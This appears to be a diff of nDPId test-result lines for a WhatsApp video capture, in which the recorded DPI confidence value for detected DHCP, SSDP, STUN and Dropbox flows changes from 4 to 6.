00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1561455772049,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1561455772049,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFInqwAAP8RG\/kAAAAA\/\/\/\/\/wBEAEMBNNtQAQEGAH5K8tcAMwAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} -00734{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455772049,"flow_last_seen":1561455772049,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455772049,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} +00734{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455772049,"flow_last_seen":1561455772049,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455772049,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1561455773318,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1561455773318,"pkt":"AQBef\/\/6kLkxKPrKCABFAACgzaAAAAIRN\/7AqAIM7\/\/\/+shNB2wAjBq9TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTklQQ29ubmVjdGlvbjoxDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KTVg6IDMNCg0K"} 00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1561455776326,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1561455776326,"pkt":"AQBef\/\/6kLkxKPrKCABFAAChemIAAAIRizvAqAIM7\/\/\/+shNB2wAjbrDTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTlBQUENvbm5lY3Rpb246MQ0KTUFOOiAic3NkcDpkaXNjb3ZlciINCk1YOiAzDQoNCg=="} 00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1561455780246,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1561455780246,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFInq0AAP8RG\/gAAAAA\/\/\/\/\/wBEAEMBNNtIAQEGAH5K8tcAOwAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455781247,"flow_last_seen":1561455781247,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455781247,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":53688,"dst_port":59491,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1561455781247,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455781247,"pkt":"xiwDYGpkkLkxKPrKCABFAABIyagAAEARnszAqAIMATxOQNG46GMANIouAAEAGCESpELJdbow6qY0UK1Q3DAACAAUjCUqyJwTIDkKR+sjy0Uf5fkPaoE="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455781247,"flow_last_seen":1561455781247,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455781247,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":53688,"dst_port":59491,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455781247,"flow_last_seen":1561455781247,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455781247,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":53688,"dst_port":59491,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455781352,"flow_last_seen":1561455781352,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455781352,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","src_port":53688,"dst_port":32641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1561455781352,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455781352,"pkt":"xiwDYGpkkLkxKPrKCABFAABIUPMAAEAR0s7AqAIMW\/w4M9G4f4EANAIPAAEAGCESpEIZqLFMH0mnKh34iiEACAAUNcgqBRg9v\/os\/sidMBIfN2R1dO0="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455781352,"flow_last_seen":1561455781352,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455781352,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","src_port":53688,"dst_port":32641,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455781352,"flow_last_seen":1561455781352,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455781352,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","src_port":53688,"dst_port":32641,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1561455781879,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455781879,"pkt":"xiwDYGpkkLkxKPrKCABFAABIUTkAAEARFzzAqAIMATxOQNG46GMANHzbAAEAGCESpELHuuAP05RaI+J6URIACAAUsHZdEyJr5uObsKQa7DYbE4YCA9M="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1561455782059,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455782059,"pkt":"xiwDYGpkkLkxKPrKCABFAABI8PwAAEARMsXAqAIMW\/w4M9G4f4EANE0kAAEAGCESpEKAWzwjt5VRcfVmBmsACAAUJw9zjdQvQsjy5FQih0Itb6wHKg0="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1561455782574,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455782574,"pkt":"xiwDYGpkkLkxKPrKCABFAABIwHEAAEARqAPAqAIMATxOQNG46GMANGXPAAEAGCESpEIoM9pd\/2PDbhKoL1oACAAUvqQBu1i76V7zg0ib1\/6QLghtUUY="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1561455782679,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455782679,"pkt":"xiwDYGpkkLkxKPrKCABFAABINRkAAEAR7qjAqAIMW\/w4M9G4f4EANKRJAAEAGCESpEL4j9YAEpPJGTu3VCAACAAUGXORRrB48FGvPcJutSVccHGlcxM="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1470,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455791449,"flow_last_seen":1561455791449,"flow_idle_time":200000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1561455791449,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00904{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1470,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1561455791449,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"thread_ts_msec":1561455791449,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAFxMkoAAEARwOHAqAIBwKgC\/0RcRFwBXbU+eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxNzQ1NjcxOTM5MjIwMTQ2OTg4Njg4NzAzNTEyMjAyNTg3OTI0NDMsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODA5NDIwMDQ4LCA1MTE3MDY2NDIsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA0ODEwNTkxNzYwLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAzMDc1NTIxNjk2LCA0MDU2NDYyNTkyLCAyOTYzNjgyMDk2LCAxNTIyMTc3NTg3XX0="} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1470,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455791449,"flow_last_seen":1561455791449,"flow_idle_time":200000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1561455791449,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1470,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455791449,"flow_last_seen":1561455791449,"flow_idle_time":200000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1561455791449,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1471,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1561455791449,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1561455791449,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAFvmCUAAEARWwjAqAIBwKgC\/0RcRFwBW7HJeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxNzQ1NjcxOTM5MjIwMTQ2OTg4Njg4NzAzNTEyMjAyNTg3OTI0NDMsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsxMTgyMzk1NTczLCAxNDIxMTE0Mzk5LCAxODA4MDQ3NjgwLCAxMzcyMDkyNjA5LCAxMjUyMTE2NDI5LCA5OTQ2OTc3MywgNTI1ODAwNzEyMCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNDUxNDcyNjU4LCA0MTc0NjUwODgwLCAyODUyMTYwNywgMTQxNTYyMDM1MF19"} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1537,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455792270,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455792270,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":65025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1537,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1561455792270,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1561455792270,"pkt":"AQBef\/\/6kLkxKPrKCABFAAClb\/UAAAIRlaTAqAIM7\/\/\/+v4BB2wAkbTRTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1537,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455792270,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455792270,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":65025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1537,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455792270,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455792270,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":65025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1543,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455792273,"flow_last_seen":1561455792273,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455792273,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51458,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00630{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1543,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1561455792273,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1561455792273,"pkt":"AQBef\/\/6kLkxKPrKCABFAACleZoAAAIRi\/\/AqAIM7\/\/\/+skCB2wAkenQTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1543,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455792273,"flow_last_seen":1561455792273,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455792273,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51458,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1543,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455792273,"flow_last_seen":1561455792273,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455792273,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51458,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1563,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1561455795276,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1561455795276,"pkt":"AQBef\/\/6kLkxKPrKCABFAACgOnoAAAIRyyTAqAIM7\/\/\/+skCB2wAjBoITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTklQQ29ubmVjdGlvbjoxDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KTVg6IDMNCg0K"} 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1564,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1561455795277,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1561455795277,"pkt":"AQBef\/\/6kLkxKPrKCABFAACg4VAAAAIRJE7AqAIM7\/\/\/+v4BB2wAjOUITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTklQQ29ubmVjdGlvbjoxDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KTVg6IDMNCg0K"} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455770313,"flow_last_seen":1561455779337,"flow_idle_time":200000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51277,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455772049,"flow_last_seen":1561455780246,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1561455769791,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455769790,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":422,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 